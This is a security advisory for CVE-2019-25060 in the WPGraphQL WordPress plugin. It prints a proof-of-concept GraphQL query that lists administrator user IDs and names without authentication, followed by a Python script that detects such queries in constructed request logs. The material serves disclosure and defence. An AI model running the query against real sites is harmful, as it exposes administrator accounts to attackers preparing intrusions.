Description
The WPGraphQL plugin (versions before 0.3.5) does not properly restrict access to information about other users' roles on the affected WordPress site. Because of this, a remote, unauthenticated attacker can craft a GraphQL query that filters users by role and thereby learn the account roles of every user on the site. This issue has been assigned CVE-2019-25060.
Proof of Concept
- Make this GraphQL call as an unauthenticated user on any WordPress site using this plugin:

```graphql
query getUsers {
  users(where: {role: ADMINISTRATOR}) {
    edges {
      node {
        userId
        name
      }
    }
  }
}
```
The response will be:

```json
{
  "data": {
    "users": {
      "edges": [
        {
          "node": {
            "userId": 1,
            "name": "root"
          }
        }
      ]
    }
  }
}
```
An unauthenticated user is thus able to enumerate the accounts holding the administrator role on the WordPress site (user IDs and display names), information that should only be available to users with permission to list users. The issue was fixed in https://github.com/wp-graphql/wp-graphql/pull/900.
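As an added example that is not part of this advisory, the following Python snippet shows how a site operator or SOC could screen captured GraphQL request bodies for unauthenticated, role-filtered `users` queries of the kind shown above, and how to count the accounts a response would disclose. The request records and their `authenticated` flag are a constructed log format, not something the plugin produces.

```python
import json
import re

# Constructed sample records: JSON-encoded GraphQL request bodies as a WAF or
# application log might capture them, with a flag for whether a session existed.
SAMPLE_REQUESTS = [
    {"authenticated": False,
     "body": '{"query":"query getUsers{ users(where:{role:ADMINISTRATOR}){ edges{ node{ userId name } } } }"}'},
    {"authenticated": False,
     "body": '{"query":"{ posts { nodes { title } } }"}'},
    {"authenticated": True,
     "body": '{"query":"{ users(where: { roleIn: [ADMINISTRATOR, EDITOR] }) { nodes { name } } }"}'},
    {"authenticated": False,
     "body": '{"query":"{ users { nodes { name } } }"}'},
]

# Matches a `users(` selection whose `where` argument filters by role.
# WPGraphQL accepts role, roleIn and roleNotIn; whitespace is normalised
# before matching so formatting differences do not evade the check.
ROLE_FILTER = re.compile(
    r"\busers\s*\(\s*where\s*:\s*\{[^}]*\brole(?:In|NotIn)?\s*:", re.IGNORECASE)


def extract_query(body):
    """Pull the GraphQL document out of a JSON request body (or return raw text)."""
    try:
        doc = json.loads(body)
    except ValueError:
        return body
    query = doc.get("query", "") if isinstance(doc, dict) else ""
    return query if isinstance(query, str) else ""


def is_role_enumeration(query):
    """True when the query filters the users connection by role."""
    return bool(ROLE_FILTER.search(" ".join(query.split())))


def flag_unauthenticated_role_queries(requests):
    """Indexes of requests that filter users by role without an authenticated session."""
    return [i for i, r in enumerate(requests)
            if not r["authenticated"] and is_role_enumeration(extract_query(r["body"]))]


def disclosed_accounts(response_json):
    """Names returned by a users query response (edges/node shape as in the PoC)."""
    edges = json.loads(response_json).get("data", {}).get("users", {}).get("edges", [])
    return [e["node"]["name"] for e in edges if "node" in e]
```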